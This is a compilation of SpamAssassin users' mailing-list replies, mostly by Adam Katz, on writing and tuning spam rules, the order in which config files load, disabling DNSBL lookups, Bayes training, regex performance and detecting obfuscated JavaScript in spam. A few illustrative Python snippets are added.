 uri_detail T_KHOP_FOREIGN_CLICK text =~
 /\b(?:cli(?:quez\W|ck\Wa)ici\b|cli(?:cca\W|c\Wa|que\Wa)qu[^.,a ]|klie?k(?:\Whi?er|ni(?:j|nite)\Wtu[tk]aj)\b)/i

The sandbox promotion system does make this a bit more confusing than it
should be (using a double negative), but it is assembling the two
versions of the rule correctly:

##{ T_KHOP_FOREIGN_CLICK if ! plugin (Mail::SpamAssassin::Plugin::URIDetail)

if ! plugin (Mail::SpamAssassin::Plugin::URIDetail)
  rawbody    T_KHOP_FOREIGN_CLICK
m{\bhref=[^>]{9,199}>[^<]{0,80}(?:<(?!/a\b)[^>]{0,299}>[^<]{0,80}){0,9}[^<]{0,80}\b(?:cli(?:quez\W|ck\Wa)ici\b|cli(?:cca\W|c\Wa|que\Wa)qu[^.,a ]|klie?k(?:\Whi?er|ni(?:j|nite)\Wtu[tk]aj)\b)}si
endif
##} T_KHOP_FOREIGN_CLICK if ! plugin (Mail::SpamAssassin::Plugin::URIDetail)

##{ if !(! plugin (Mail::SpamAssassin::Plugin::URIDetail))_sandbox

if !(! plugin (Mail::SpamAssassin::Plugin::URIDetail))
  uri_detail T_KHOP_FOREIGN_CLICK   text =~
/\b(?:cli(?:quez\W|ck\Wa)ici\b|cli(?:cca\W|c\Wa|que\Wa)qu[^.,a ]|klie?k(?:\Whi?er|ni(?:j|nite)\Wtu[tk]aj)\b)/i
endif
##} if !(! plugin (Mail::SpamAssassin::Plugin::URIDetail))_sandbox

This means that the rawbody version is used if URIDetail isn't loaded
and the uri_detail version is used if the URIDetail plugin is loaded.
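The click-word alternation shared by both forms can be exercised directly; a Python re sketch using the word list as it appears in the uri_detail rule:

```python
import re

# "click here" in French, Italian, Spanish/Portuguese, Dutch/German, Polish...
click_words = re.compile(
    r'\b(?:cli(?:quez\W|ck\Wa)ici\b|cli(?:cca\W|c\Wa|que\Wa)qu[^.,a ]'
    r'|klie?k(?:\Whi?er|ni(?:j|nite)\Wtu[tk]aj)\b)', re.I)

for phrase in ("cliquez ici", "clicca qui", "clique aqui", "klik hier"):
    assert click_words.search(phrase)
assert not click_words.search("click here")  # plain English is not matched
```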




[OT] Re: Privacy Concerns and Implementing Corrective Proceedures To Combat Information Harvesting

2012-09-18 Thread Adam Katz
This topic is off topic.  I have marked the subject as such.

On 09/05/2012 09:40 PM, NMTUser X ...@gmail.com wrote:
 Would it be possible to send mail to myself encrypted in pgp/gpg,
 use a token at the beginning of the email with the correct email
 address (which is on the local network) have procmail or spamassassin
 parse all incoming messages, strip the headers, decrypt the message,
 and reinsert it into the mail spool to be forwarded to the correct 
 person? If so where do I begin to look?  Could (gpgzip) attachments 
 be preserved?
 
 This would allow me to continue to use gpg I could ditch google and 
 use ANY mail forwarding agent - even hushmail - and I could keep my 
 professional life intact.

Okay, full stop before I tell you how to do this.

WTF are you doing using google if you're this paranoid?  Not only are
they an advertiser giving you a service so they can farm your data for
profit, but they're also stats gurus who are insanely good at exactly
that!  Continuing to use them but sending all mail to a remailer will
still grant them full access to your mail folders, so they still get all
that data anyway.

You appear to be trying to hack your way into privacy with Google.
Knock it off, there's no way you can make it work.  (The only thing I
can think of would essentially be serving everything yourself and using
some kind of hack of their IMAP system for free cloud storage.  This is
stupid as you can do far better --  consider hushmail or an ec2 system.)



I am therefore going to assume you're on an email infrastructure you
trust (for outgoing SMTPS, incoming IMAPS/POP3S, and secure storage of
your inbox/folders).  This means I will reinterpret your question as one
that asks about masking the sender and recipient while in the clear over
the internet and leaving a minimal footprint overall.  A further
assumption is that your recipients have and use PGP.  Otherwise, there's
really no point in this exercise.

If your recipients use SSL to connect to their email infrastructure and
you trust that infrastructure, you're done already; your message
should(?) be encrypted point-to-point and therefore only visible to the
trusted infrastructures on each end.  Anybody sniffing the traffic sees
only the two IPs involved.  PGP is merely an extra layer protecting you
from misplaced trust (nosy admins, service providers getting subpoenaed,
insecure server backups, etc).

Otherwise, there isn't much you can do unless you have at least partial
trust.

Here's a draft that can do most of that:

Create user encryptedmail in the recipient's email infrastructure (or on
a proxy if you really want that kind of thing).  Create a file at
/etc/mail/pgp-key-map with lines like 123ABC78=j...@example.com (sans
quotes) that maps known keys (8-char IDs) to approved recipient emails.
 Give encryptedmail this procmail recipe:


# Extract keys from message, get addresses from map file
KEY_RECIPS=`gpg --decrypt 2>&1 |perl -ne '/key, ID ([0-9A-F]{8}),/ && print "$1\n"' |grep -Fwf- /etc/mail/pgp-key-map |sed 's/^[^=]*=//'`

# If mapped keys were found and we're not looped, add anti-loop header
:0fhw
* KEY_RECIPS ?? @
* !^X-Proxied-By: encryptedmail@
|formail -A "X-Proxied-By: encryptedm...@example.com"

# Forward if above matched and was successful
:0a
! $KEY_RECIPS
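For readers who don't speak procmail or shell, here is the same key-to-address mapping logic as a Python sketch. The sample gpg line and addresses are hypothetical; the map format follows the KEYID=address convention described for /etc/mail/pgp-key-map above.

```python
import re

def recipients_for_keys(gpg_output, key_map):
    """Pull 8-char key IDs out of gpg's output and map them to
    approved addresses, mirroring the shell pipeline above."""
    ids = set(re.findall(r'key, ID ([0-9A-F]{8}),', gpg_output))
    approved = []
    for line in key_map.splitlines():
        key, _, addr = line.partition('=')
        if key in ids and addr:
            approved.append(addr)
    return approved

# Hypothetical data for illustration only:
gpg_out = 'gpg: encrypted with 2048-bit RSA key, ID 0A1B2C3D, created 2012-01-01'
key_map = '0A1B2C3D=user1@example.com\n4E5F6A7B=user2@example.com'
assert recipients_for_keys(gpg_out, key_map) == ['user1@example.com']
```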


The sending end is easy, though your encryption agent won't be happy
about encrypting a message to an address that isn't being sent to.  You
can encrypt /after/ signing rather than before and then alter your
from address to be uninformative if you want to hide this side (just
watch out for SPF and spam detection that keys on the sender
name/address).  The recipient will be able to identify you by your
signature after decrypting the message.  Remember that the Subject is
still in the clear.

Note:  the bad guys can do this too, unless the PGP keys are
unpublished.  That makes this security through obscurity; it's not
(currently) worth their while to look for because nobody does it and
it's much harder than merely scraping the To/Cc fields.  There is other
identifying information in the headers that can be (painfully) extracted
as well.  The above proposal does have those minor holes but is the best
~transparent way of doing this that I can think of short of a full-blown
remailer, which is only transparent to the recipient (after procmail
magic) since it would involve hackery at the client level for wrapping
up and sending a double-encrypted message.

Note 2:  This has a hole spammers can exploit.  You really need some way
of ensuring that the encryptedmail@proxy address is accessible only to
you.  You can do this with procmail by isolating some piece of your
messages (ideally the PGP signature, but if you need to hide that,
perhaps a specific IP or a DKIM-signed From address).





Re: Spamhaus and others check at MTA level: how disable in Spamassassin?

2012-08-07 Thread Adam Katz
On 08/06/2012 08:01 AM, Bowie Bailey wrote:
 Actually, since these are more complex rules, just setting the score to
 0 will not stop the DNS check.  This is what I have in my config:
 
 # Blocking Zen with MTA...don't need these
 meta RCVD_IN_SBL (0)
 meta RCVD_IN_XBL (0)
 meta RCVD_IN_PBL (0)
 score __RCVD_IN_ZEN 0

You have it backwards.

I'm pretty sure scoring a rule at zero will disable it, even the DNS
lookup, UNLESS it is an underscore-prefix rule (which is not scored).
Note that zeroing a meta rule that depends on a lookup does not disable
the dependent rule.  Lookups in underscored rules can only be disabled
by redefining the rule.

Parentheses in metas work just like in math, so wrapping a whole
statement in them, as in the quoted definitions, is redundant (in score
lines, by contrast, parentheses make the value relative).  You'd likely do better with:

meta RCVD_IN_SBL 0
meta RCVD_IN_XBL 0
meta RCVD_IN_PBL 0
meta __RCVD_IN_ZEN 0

or

score RCVD_IN_SBL 0
score RCVD_IN_XBL 0
score RCVD_IN_PBL 0
meta __RCVD_IN_ZEN 0





Re: Spamhaus and others check at MTA level: how disable in Spamassassin?

2012-08-07 Thread Adam Katz
On 08/07/2012 09:19 AM, Bowie Bailey wrote:
 I don't know where I found those settings.  I did some testing and 
 verified that all three methods listed above will prevent the DNS
 query from running.
 
 I distinctly remember reading a while back that just setting the
 scores to 0 on the DNS blacklist rules would disable the scoring
 rules, but would not prevent the queries from running.  I even had
 the score lines you suggested in my local.cf file, but they were
 commented out and replaced by the lines I posted.  Maybe something
 has changed since then.

That would be a comment from Karsten Bräckelmann last October, archived
at
http://spamassassin.1065346.n5.nabble.com/Disable-a-Rule-td51492i20.html#d1320031215000-865
(I can't find the original, this is merely a reference to it).  The
relevant bit:

On 10/30/2011 08:20 PM, Karsten Bräckelmann wrote:
 Ned, you forgot to meta out __RCVD_IN_DNSWL to actually prevent the
 DNS query at all.

The "meta out" phrasing refers to the need to redefine the predicate
rule since you can't disable it with a score.





Re: How do I reenable AWL on spamassassin 3.3 after upgrade from 3.1

2012-08-02 Thread Adam Katz
 Den 2012-07-26 17:26, Nißl Reinhard skrev:
 reading the manuals, I've discovered that the AWL plugin isn't 
 loaded anymore in spamassassin 3.3. Therefore I put the
 following lines into local.cf:

 On Fri, 27 Jul 2012 02:57:26 +0200 Benny Pedersen wrote:
 oh no, do not put loadplugin into *.cf files, it's wrong per design,
 but so much wiki and bad behavior still continues

Speaking Hawaiian? (wiki == quick)  Or does the wiki actually suggest
this behavior?

On 07/26/2012 06:14 PM, RW wrote:
 It seems inelegant, but is there a practical reason why this
 shouldn't be done. Some optional plugins such as Botnet and iXhash
 load themselves from their own .cf files.

Yes, there is a practical reason.

In short, .pre files are read before .cf files, allowing all rules
access to all plugins.  If a plugin was loaded in a .cf file, it would
not be available to .cf files that load earlier.



There is a very careful ordering to the loading of files to ensure that
newer versions and overrides are correctly loaded.  Others should
correct me if I have this wrong*

1. Load /etc/spamassassin/*.pre
2. If /var/lib/spamassassin/[version] exists:
   (a) Load its *.pre files and then its *.cf files
   (b) Otherwise, load *.pre then *.cf in /usr/share/spamassassin
3. Load /etc/spamassassin/*.cf
4. Parse in order of loading
5. If an include line is encountered, interrupt everything and
   (a) load the named file
   (b) parse the named file

Files within a directory are sourced by asciibetical order (same as
`ls`).  Sub-directories are NOT examined.  Each individual file is read
from top to bottom, pausing for include directives as noted above
(this is how the updates area can have a hierarchy).
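A rough Python model of that ordering may help; it is a simplification under stated assumptions (each tree's files simply sorted and concatenated, ignoring the .pre/.cf split within the update tree, and the file names in the update tree are hypothetical):

```python
# Simplified model of the load order described above: /etc *.pre files
# first, then the sa-update tree if it exists (otherwise the stock tree),
# then /etc *.cf files -- each directory in asciibetical order.
def load_order(etc_pre, update_tree, stock_tree, etc_cf):
    middle = update_tree if update_tree else stock_tree
    return sorted(etc_pre) + sorted(middle) + sorted(etc_cf)

order = load_order(
    ['v310.pre', 'init.pre'],       # /etc/spamassassin/*.pre
    ['20_drugs.cf', '10_misc.cf'],  # hypothetical sa-update tree
    [],
    ['local.cf'],                   # /etc/spamassassin/*.cf -- loads last
)
assert order[-1] == 'local.cf'      # local.cf gets the final word
```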

This lets /etc/spamassassin/local.cf (or wherever your system puts it)
run last, thus allowing you to trump scores and definitions.

Because of the loading order, third party plugins and configs whose
installations suggest /etc/spamassassin should have file names that
asciibetically precede local.cf, ideally starting with two digits and an
underscore, mimicking the SA upstream (e.g. 20_drugs.cf).


Getting back to your question, this means that if Botnet or iXhash are
depended on before they are loaded, the dependent rule won't load
correctly.  The default install of iXhash doesn't have a problem here
because it's a self-contained item, so it loads the plugin and then uses
it later on in the same file.

This is not advisable because when you then go in to add additional
rules for that plugin, say by adding rules querying the third-party
iXhash repository from Spam-Eating Monkey in external.cf, it won't work
because the iXhash plugin isn't loaded until iXhash.cf.  Furthermore, it
prevents third-party sa-update channels from using the plugin since they
are loaded in step 2 while local.cf is loaded in step 3.

It also makes maintenance (and troubleshooting) harder, though
SpamAssassin will take it.  (There are lots of things SA can do that are
ill advised, like meta rules that use the ternary operator.)



The .pre files that live in /etc are kind of stuck named like that
(including init.pre, which is essentially v300.pre) due to their
location (otherwise, upgrading would require wiping them, which is taboo
in the Unix world).  I'd suggest installing an empty local.pre were it
not for the fact that this would come /before/ the others.  Maybe a
z_local.pre file?


* Footnote:  Methodology.

This should reveal the load order (but not the parse order):

spamassassin --lint -D config 2>&1 |egrep -o '/.*\.(pre|cf)$' |uniq





Re: KB_FAKED_THE_BAT

2012-05-14 Thread Adam Katz
On 05/03/2012 10:02 AM, Mike Grau wrote:
 The meta rule in 72_active.cf KB_FAKED_THE_BAT is getting
 circumvented here because the meta rule component

  header   __KB_DATE_CONTAINS_TAB  Date:raw =~ /^\t/
 
 is being evaded by spam that now has a space character before the tab:
 
 # grep Date: HEADERS | od -a
 000   D   a   t   e   :  sp  ht   T   h   u   ,  sp   3  sp   M   a
 020   y  sp   2   0   1   2  sp   1   6   :   5   3   :   5   9  sp
 040   +   0   7   0   0  nl
 046vi H*
 
 This has been Russian language spam (charset koi8-r) with various
 flavors of X-Mailer: The Bat!

What version of SpamAssassin are you running?  Here's a note from that
rule's definition (rulesrc/sandbox/kb/20_header.cf):

# NOTE  Depends on some header rule code fixes for 3.3.x to remove
#   the leading space that was showing up in header rules.  For
#   3.2.x releases the pattern must be changed to /^ \t/.

Karsten:  Maybe change it to   /^ ?\t/   as a workaround?
(Yes, I know we've stopped supporting sa3.2.x)
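For what it's worth, the proposed workaround behaves as intended against both header shapes (a Python stand-in for the Perl header rule; the Date value is taken from the od dump above):

```python
import re

# Tolerate an optional leading space before the tab in the raw Date value.
pat = re.compile(r'^ ?\t')

assert pat.search('\tThu, 3 May 2012 16:53:59 +0700')     # plain leading tab
assert pat.search(' \tThu, 3 May 2012 16:53:59 +0700')    # space-then-tab, as in the spam
assert not pat.search('Thu, 3 May 2012 16:53:59 +0700')   # ordinary header
```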





Re: Bayes_ignore

2012-04-06 Thread Adam Katz
On 04/01/2012 06:35 AM, joea wrote:
 While exploring Bayes stuff, (wanting to populate appropriately for
 my setup), found reference to removing headers that might confuse
 Bayes.
 
 Specifically bayes_ignore_header.
 
 The example they show is an X header.   Seems the ones spamassassin
 puts in there will be ignored without intervention.
 
 Is one only concerned with X headers?  What about things like
 Received From?   I have several upstream hosts.  Must these be
 specified?

The X- prefix is an old-fashioned convention that many argue should be
phased out.

There are two types of items you want to exclude, which may very well
include non-x-prefixed headers:

1. Headers added after SpamAssassin runs.  These can include anti-virus
(though lots of people run A/V before SA), internal mail server
(Exchange, procmail) headers, and those added by the mail client.

2. FP-prone filtering notes.  If your ISP includes its own spam filters
and you do not consider them reliable (if you do, why are you running
your own?), they will poison your bayes db.  The same thing goes for
some of the third party ClamAV rules (like the phishing detection).  Do
*not* get aggressive here: if in doubt, let Bayes play with it.

Proper Received header traversal is essential to getting SpamAssassin up
and humming.  Read the NETWORK TEST OPTIONS portion of the documentation
and be sure to specify your internal_networks, trusted_networks, and
msa_networks.  ALL deployments need at least trusted_networks (unless
you've disabled network tests, in which case I'd recommend something
other than SA) and many will improve given the differences between these
three.





Re: Regex help (targetting very long HTML comments)

2012-04-06 Thread Adam Katz
On 04/02/2012 09:40 AM, Kris Deugau wrote:
 Can anyone point out what bit of stupidity I'm committing in trying
 to use this:
 
 rawbody OVERSIZE_COMMENT   m|<!--(?!-->).{32000,}|s
 
 to match messages that are mostly very very long HTML comment(s)?
 
 Testing the same regex against the whole raw message outside of SA
 seems to fire just fine.

There are already a few rules that do this sort of thing.  Use them as
models:

% grep html_text_match..comment 20_html_tests.cf
body HTML_COMMENT_SHORT eval:html_text_match('comment', '<!(?!-).{0,6}>')
body HTML_COMMENT_SAVED_URL eval:html_text_match('comment', '<!-- saved from url=\(\d{4}\)')
body __COMMENT_EXISTS eval:html_text_match('comment', '<!.*?>')

Try this:

body OVERSIZE_COMMENT  eval:html_text_match('comment', '<!--(?!.?-->).{512,}-->')

Any more than 512 chars isn't going to be helpful but will end up being
computationally expensive (I've played with this idea).  Also, I'd say
this is more of a ham indicator than a spam indicator.
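A Python stand-in for that suggestion (SA's html_text_match eval applies the pattern to extracted comment text under its own semantics, so this only demonstrates the regex itself, on made-up samples):

```python
import re

# The suggested pattern: an HTML comment at least 512 chars long that
# isn't immediately closed.
oversize = re.compile(r'<!--(?!.?-->).{512,}-->', re.S)

assert oversize.search('<!--' + 'x' * 600 + '-->')   # very long comment hits
assert not oversize.search('<!-- saved from url -->')  # short comment doesn't
```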





Re: Some rules I created for suspicious Javascript practices

2012-02-16 Thread Adam Katz
On 02/15/2012 04:43 PM, Thomas Rutter wrote (as neon_overload):
 I have created some rules which I have found to be very effective so 
 far at identifying a certain type of spam that spamassassin 
 otherwises cannot detect.

 I hereby license them under the WTFPL which is GPL and Apache license
 compatible.

I am interpreting that license as rename things and they're essentially
public domain.  Rules have been renamed, tweaked, and added to
subversion for testing.  After the next ruleqa run (probably tomorrow),
you can see how they perform on the SpamAssassin corpus at
http://ruleqa.spamassassin.org/?srcpath=neon_overload.cf

The new versions, which are Apache License 2.0, are attached.  Note that
attribution, though not requested, is present.

Thomas Rutter:  If you have any objections to what I did, complain now.
# I hereby license them under the WTFPL which is GPL and Apache license
# compatible. -- Thomas Rutter/neon_overload to SA-users, 2012-02-16 00:43 UTC
# 
http://old.nabble.com/Some-rules-I-created-for-suspicious-Javascript-practices-tt3130.html
# 
# WTFPL 2.0 basically says rename things and they're essentially public domain
# Rules have been renamed and slightly tweaked

rawbody  JS_EXTRA_UNESCAPE  
/[+=]\s{0,9}unescape\s{0,9}\(\s{0,9}[']%(?i:6[1-9A-F]|7[0-9A])/
describe JS_EXTRA_UNESCAPE  JavaScript: Unnecessary URI escaping
#score LOCAL_UNNECESSARY_UNESCAPE 1.7

rawbody  JS_EXTRA_CONCAT
/[+=]\s{0,9}['][a-z0-9]{1,64}[']\+['][a-z0-9]{1,64}[']/i
describe JS_EXTRA_CONCATJavaScript: Unnecessary string concatenation
#score LOCAL_UNNECESSARY_STRCONCAT 0.5

rawbody  JS_FROMCHARCODE/=\s{0,9}String\.fromCharCode\b/
describe JS_FROMCHARCODEJavaScript: function String.fromCharCode
#score LOCAL_HIDE_FROMCHARCODE 0.7

#rawbody  LOCAL_HIDE_URL/h\+tt\+p:\+\//
rawbody  JS_CONCATINATED_HTTP   
m@(?!http:/)h['+]{0,3}(?:t['+]{0,3}){2}p['+]{0,3}:['+]{0,3}/@
describe JS_CONCATINATED_HTTP   Contains concatenated URI like htt+p://...
#score LOCAL_HIDE_URL 0.7
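As a quick sanity check, the fromCharCode pattern behaves as expected in a Python stand-in (the JavaScript snippets are hypothetical; Perl and Python regex semantics agree for this pattern):

```python
import re

# Stand-in for the JS_FROMCHARCODE rawbody pattern above.
fromcharcode = re.compile(r'=\s{0,9}String\.fromCharCode\b')

assert fromcharcode.search('var s = String.fromCharCode(104, 116, 116, 112);')
assert not fromcharcode.search('var s = "http";')
```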





Re: update channel list

2012-01-20 Thread Adam Katz
On 01/18/2012 09:25 AM, dar...@chaosreigns.com wrote:
 All of those are currently listed by Adam Katz on
 http://khopesh.com/wiki/Anti-spam
 I expect that list to be up to date.  
 He's an active spamassassin developer.  

All of my channels are still relevant, though the only actively
(automatically) updated one is khop-sc-neighbors.  khop-blessed is also
useful if you're looking for ways to limit FPs.  The rest are only
useful if you want to get more aggressive than the upstream, as almost
all of those rules are ready for promotion through my svn sandbox.

 That page also lists 90_2tld.cf.sare.sa-update.dostech.net.

That one is only useful for sa3.2.5 users.  I need to update my site.





Re: French rules

2011-12-08 Thread Adam Katz
On 12/08/2011 03:51 PM, LEVEAU Stanislas wrote:
 I am looking for French rules with sa-update?
 Does it exist?

Most of the body rules in previous versions of SpamAssassin were phased
out because the Bayesian filter does a *significantly* better job at
that sort of thing.  The few that remain target rarer patterns since
lower volume messages are more likely to evade the learning components.

You should therefore train the Bayes component.  Learn more at
http://wiki.apache.org/spamassassin/BayesInSpamAssassin

Bonne chance!





Re: Martin Gregorie's portmanteau rule building script

2011-11-30 Thread Adam Katz
On 11/30/2011 03:59 AM, Martin Gregorie wrote:
 On Tue, 2011-11-29 at 14:22 -0800, Adam Katz wrote:
 You might want to consider Regexp::Assemble for your tool, though
 that would require using perl. This would cause your man page's
 example rule to result in something like this:
 
body __AU0 /(?i-xsm:\balt[123]\b)/

 rather than your script's *much* slower:

body __AU0 /\b(alt1|alt2|alt3)\b/i

 Interesting idea. Currently my system's performance seems 'adequate',
 considering I'm running SA on an 866 mHz P3 box with 512 MB RAM:
 Min Avg  Max
 Scan times: 0.9 (   3401 bytes) 4.0128.3 (  72858 bytes)
 Msg sizes: 2258 (1.8 secs )   10474   507533 (6.2 secs )
 Messages:  2032
 
 What sort of speed-up would Regexp::Assemble provide? 
 How would that compare with compiling the portmanteau.cf file?

Great question.  I do not have an answer.

How much optimization does re2c provide?  I am under the impression all
it does is convert text-based PCREs to C/C++ code of some sort, which
fully(?) mimics the original regexp's logic, implying that optimization
before compilation matters a lot.

I popped into irc://freenode.net#regex to ask, but this is apparently
too archaic a question.  Maybe somebody will have an answer in time.  (I
am not motivated enough to create an impromptu benchmark suite myself.)





Re: How long can a rule be?

2011-11-29 Thread Adam Katz
Summary for the impatient:
Do not write rules like this.
Instead, train Bayes, make sure you're using DNSBLs.

On 11/25/2011 09:49 AM, Sergio wrote:
 I wrote all the HELO spammers that SA didn't caught
...
 header   CHARLY_RULE1ALL =~ /(...)/i
 describe CHARLY_RULE1Charly Spammers
 scoreCHARLY_RULE111

Given the description in your email, that should probably be:

header   CHARLY_RULE1X-Spam-Relays-Untrusted =~ / helo=(?:...) /i
describe CHARLY_RULE1A custom list of uncaught relay HELOs
scoreCHARLY_RULE14

You should be *very* careful about scoring any individual rule at or
above the spam flagging threshold (default is 5, do not lower).  There
is almost always a better (and safer!) solution.

 My concern is, is too much for just one rule or the rule can grow
 without limit?

Let's just say you don't need to worry about that.  We have several 150+
character rules on SA's trunk and I've seen rules with regexp lengths in
the thousands (not that that's necessarily a good thing, but it does
work, albeit slowly).


Still, this seems like a really bad idea; one hammy HELO in there and
the whole thing starts hurting.  I think you'll be *far* better served
by training bayes.

You should also double check to ensure your DNS lookups are properly
configured and plugins like Razor are turned on.  We don't have the best
of resources to walk you through this, but you can start with
http://wiki.apache.org/spamassassin/DnsBlocklists#Questions_And_Answers





Martin Gregorie's portmanteau rule building script

2011-11-29 Thread Adam Katz
On 11/25/2011 10:13 AM, Martin Gregorie wrote:
 Subject: [Fwd: Re: How long a rule can be?]

My main answers to the original thread were posted there (today). I
guess I'm too accustomed to orderly threads; coupling my threaded view
in thunderbird with the big pile of mail unread since before the holiday
and I missed this thread when responding to the original.

If you want to fork the thread into a tangent, please change the subject
so other responses to it don't follow you.  Also, don't respond to the
parts of the thread you are not forking; those belong in another message
in the original thread.

</rant>


 If you're finding your rule is starting to get difficult to maintain,
 take a look at my rule assembly tool, which is designed to allow such
 rules to be defined in an easily edited file for each rule that are
 used to create a single .cf file. See: 
 http://www.libelle-systems.com/free/portmanteau/portmanteau.tgz
 
 I was thinking of using a server plus plugin to do this but was 
 convinced that this 'portmanteau rule' approach was better: it 
 certainly works well for me.

You might want to consider Regexp::Assemble for your tool, though that
would require using perl.  This would cause your man page's example rule
to result in something like this:

   body __AU0 /(?i-xsm:\balt[123]\b)/

rather than your script's *much* slower:

   body __AU0 /\b(alt1|alt2|alt3)\b/i
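The two forms accept exactly the same strings, which a quick check confirms (Python as a stand-in for Perl; the sample strings are mine):

```python
import re

# Both forms match the same set of strings; only the engine's path differs.
assembled = re.compile(r'\balt[123]\b', re.I)       # Regexp::Assemble-style
naive     = re.compile(r'\b(alt1|alt2|alt3)\b', re.I)

for s in ['alt1', 'ALT2', 'use alt3 here', 'alt4', 'altitude']:
    assert bool(assembled.search(s)) == bool(naive.search(s))
```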





Re: (Non-) Capturing REs

2011-10-25 Thread Adam Katz
On Mon, 2011-10-24 at 13:58 -0700, Adam Katz wrote:
 Using special variables like those you mentioned are particularly 
 bad, [...] That's not to say that the extra memory consumption
 from an unnecessary grouping doesn't impact performance.

On 10/24/2011 02:45 PM, Karsten Bräckelmann wrote:
 Well, does it? Measurably? Even if the RE does *not* match?

If the RE doesn't match, I doubt it.  Not sure though.

 If so, does it still have any measurable effect, if we're talking a 
 handful custom rules, with stock rules using non-capturing grouping?
 (The objective here is a trade-off between optimized REs and not 
 confusing users who aren't intimately familiar with REs. They tend to
 get heavy to grasp rather quickly, and the extra ?: weird chars don't
 help that.)

Interesting point.  Maybe we shouldn't get into such detail with an
admin that just wants to add a few rules.

Also, there are better ways to optimize rules; e.g. assuming matchers
don't consume memory if the RE doesn't match, starting the RE
unambiguously -- non-parenthetical, non-globbed, non-character-class,
etc, ideally starting with a rare character; /\bfoo (bar|vaz)/ is better
than /(foo bar|foo vaz)/ while perl's left-to-right nature makes the
gain on /\b(hello|goodbye) world\b/ over /(hello world|goodbye world)/
far less notable (it's only notable if lots of other things commonly
follow hello).
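To be clear, factoring out the common prefix doesn't change what matches, only how quickly the engine can reject non-matches; a quick sketch (sample strings are mine, and I've used a non-capturing group where the prose shows a capturing one):

```python
import re

# Factoring the shared "foo " prefix preserves the match set while letting
# the engine bail out at the first character on non-"foo" text.
factored = re.compile(r'\bfoo (?:bar|vaz)')
naive    = re.compile(r'(?:foo bar|foo vaz)')

for s in ['foo bar', 'foo vaz', 'foo baz', 'food bar', 'no hit']:
    assert bool(factored.search(s)) == bool(naive.search(s))
```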

 Is it really worth it, religiously using non-capturing grouping?
 
 From the profiling I've seen, yes it is.  (I don't have data to 
 share though, sorry).
 
 The profiled code, does it use the special match capturing variables
 *anywhere* in the entire program? The profiled and compared 
 versions, would that be like the equivalent of using capturing vs 
 non-capturing in all SA stock rules?

I'm not sure, though I seem to recall the SA debug output includes the
matched text (which implies $&), though if this were important, I'm sure
we'd have already concluded it worthwhile to do stupid things like
surrounding entire regexps with (?=this).

 Not trying to be confrontational, just honestly asking and wondering
 about the real impact. After all, the perlre docs specifically 
 mention to strongly prefer non-capturing grouping basically once
 only -- in the warning paragraph about the special vars.

The perl docs may have cut that for simplicity, just as you're
suggesting above ;-)

In reality, optimizing (including gaming of Perl's built-in
optimizations) is quite non-trivial.  Here's an excerpt from O'Reilly's
Mastering Regular Expressions (2nd Ed, page 253):

 Let me give a somewhat crazy example: you find  (000|999)$  in a Perl
 script, and decide to turn those capturing parentheses into 
 non-capturing parentheses. This should make things a bit faster, you
 think, since the overhead of capturing can now be eliminated. But 
 surprise, this small and seemingly beneficial change can slow this 
 regex down by /several orders of magnitude/ (thousands and thousands 
 of times slower). /What!?/ It turns out that a number of factors come
 together just right in this example to cause the end of 'string/line
 anchor optimization' (pg 246) to be turned off when non-capturing 
 parentheses are used. I don't want to dissuade you from using 
 non-capturing parentheses with Perl--their use is beneficial in the 
 vast majority of cases--but in this particular case, it's a
 disaster.





Re: (Non-) Capturing REs

2011-10-24 Thread Adam Katz
On 10/23/2011 06:44 PM, Karsten Bräckelmann wrote:
 [...] as I read it, the warning is referring to the usage of the 
 special $, $` and $' match capturing variables, resulting in a 
 substantial performance penalty -- and mentions the non-capturing 
 extended regex in this *context*, since it uses the same mechanism
 for the $n matches. If these special vars are used.

Using special variables like those you mentioned are particularly bad,
especially with some of the older versions of perl (I seem to recall
some of them getting big performance boosts in more recent perl
revisions).  That's not to say that the extra memory consumption from an
unnecessary grouping doesn't impact performance.

 Now, I just grepped the entire SA source code, and NONE of these
 spacial vars are used. Yay!  (I did not grep all external SA
 dependencies, mind you.)

I'm guessing I'm not the only person that looks through the rules
periodically for such things, including frivolous portions like the glob
in /foo.*/ or the range in /bar\W{2,30}/ and wipe them out to become
e.g. /foo/ and /bar\W{2}/
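For boolean hit/no-hit rules like SA's, those trailing globs and padded ranges really are frivolous (Python stand-in, sample strings mine; the same argument covers /bar\W{2,30}/ versus /bar\W{2}/):

```python
import re

# For hit/no-hit purposes the trailing glob is dead weight: any string
# containing "foo" satisfies both patterns, and no other string satisfies
# either.
for s in ['foo', 'foobar', 'a foo b', 'bar', '']:
    assert bool(re.search(r'foo.*', s)) == bool(re.search(r'foo', s))
```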

 So, does this substantial performance penalty using capturing
 groups even apply to SA?
 
 Is it really worth it, religiously using non-capturing grouping?

From the profiling I've seen, yes it is.  (I don't have data to share
though, sorry).





Re: Chickenpoxed subjects

2011-10-20 Thread Adam Katz
On 10/19/2011 04:43 AM, Mynabbler wrote:
 You are kidding, right? 50% of this crap comes from FREEMAIL
 addresses, and even more specific: 44% of this crap is delivered by
 aol.com.  The aol deliveries have about 85% unique from@aol
 addresses, so they pretty much 'own' aol.

We're writing spam filters, not idiot filters.  The fact that there is
so much overlap is often useful, but the overlap is not complete.  There
is also a decent amount of overlap between the
mostly-computer-illiterate and freemail users.  I think this drives your
current line of thinking.

There are a lot of people that do very spammy things.  It is a testament
to SA and other filters that such non-spam doesn't so commonly flag as spam.





Re: Rule to count freemail recipients?

2011-10-18 Thread Adam Katz
On 10/17/2011 08:42 PM, Tom wrote:
 I'm using a couple rules I found here that hits when there are 5-9 or
 10+ recipients:
 
 header __COUNT_RCPTS ToCc =~ /(?:[^@,\s]+@[^@,\s]+)/
 tflags __COUNT_RCPTS multiple
 
 meta RCPTS_5_10 (__COUNT_RCPTS >= 5)
 score RCPTS_5_10 1.0
 describe RCPTS_5_10 Message has 5 or more recipients
 
 meta RCPTS_10_PLUS (__COUNT_RCPTS >= 10)
 score RCPTS_10_PLUS 1.0
 describe RCPTS_10_PLUS Message has 10 or more recipients

We get requests for this all the time on this list.  Several
implementations have been made and then removed (some may even still
exist in svn sandboxes) for their poor performance.  While none of them
(including your own) have specifically hunted freemail recipients, I can
tell you from experience that this won't help reduce false positives.
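For reference, here is what the quoted counting rule amounts to, as a Python sketch (tflags multiple makes SA count every match of the pattern; the addresses are hypothetical):

```python
import re

# Count address-like tokens in the combined To/Cc headers, like the
# quoted __COUNT_RCPTS rule does.
def count_rcpts(tocc):
    return len(re.findall(r'[^@,\s]+@[^@,\s]+', tocc))

many = ', '.join('user%d@example.com' % i for i in range(5))
assert count_rcpts(many) >= 5           # would trip RCPTS_5_10
assert count_rcpts('user0@example.com') == 1
```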





